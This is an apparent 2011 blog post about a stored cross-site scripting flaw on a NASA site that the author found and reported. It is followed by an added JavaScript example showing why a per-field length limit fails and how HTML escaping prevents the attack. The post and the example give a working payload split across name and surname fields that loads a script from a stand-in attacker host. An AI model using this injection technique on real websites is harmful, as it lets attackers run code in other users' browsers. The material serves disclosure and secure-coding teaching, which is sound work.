Saturday, 6 August 2011

XSS on NASA Web site

For as long as I can remember I have loved stupid films about hackers; my love for this kind of film is directly proportional to how stupid they are.
In every stupid hacker movie the hackers have to hack the NASA computers at least once, and I wanted to be a super-hacker.

I created an account on mynasa.nasa.gov and discovered that they did not use any kind of escaping for the name fields; the only thing they do is reject names or surnames longer than 20 characters (OMG!!)

I created an account with the name:
  <script src="

And the surname:
  http://evil_site.com/hack.js">

When you log in to the site the name and the surname are shown together, building the following line:
<script src=" http://evil_site.com/hack.js">

And inside the target JavaScript file I put the code that modifies the site.
The problem is that when you post a new comment on a picture, or on any other content on the site, your name and surname appear, and the JavaScript code is injected.
I reported this bug to NASA, and they disabled the comment system; now when you want to comment on anything you have to enter your name each time, and a JavaScript function (¿?) checks that you are not trying to insert any evil code; in a second stage, the comment passes a manual filter after it is published.
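Added example, not code from the original post or from the NASA site: it reproduces the pattern described above (a per-field length limit as the only check, then unescaped concatenation of name and surname into the page) and shows what HTML output encoding changes. The profile values and the `x.example` host are constructed placeholders.

```javascript
// Added example (not from the original post). Shows why a per-field length
// limit does not stop stored XSS when the fields are later concatenated
// into HTML without escaping, and what output encoding does about it.

const MAX_FIELD_LEN = 20; // the only check the post says the site applied

// Constructed profile: the payload is split across two fields so that each
// field passes the length check on its own (placeholder host, not a real URL).
const profile = {
  name: '<script src="',
  surname: '//x.example/a.js">',
};

// The site's check, as described: only the length of each field is limited.
function passesLengthCheck(p) {
  return p.name.length <= MAX_FIELD_LEN && p.surname.length <= MAX_FIELD_LEN;
}

// Vulnerable renderer: builds the greeting by plain string concatenation,
// so the two fields join into one script tag.
function renderGreetingUnsafe(p) {
  return `<p>Hello ${p.name} ${p.surname}</p>`;
}

// Minimal HTML entity encoding for text content and quoted attributes.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[c]);
}

// Hardened renderer: every untrusted value is encoded for the HTML context
// at output time, regardless of what the input validation allowed.
function renderGreetingSafe(p) {
  return `<p>Hello ${escapeHtml(p.name)} ${escapeHtml(p.surname)}</p>`;
}

// Simple output check for review or testing: does the rendered HTML contain
// a script tag that the template never put there?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}
```

The length check accepts the profile, the unsafe renderer emits a live script tag, and the escaped renderer emits only inert text.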
You can see the video with an example:
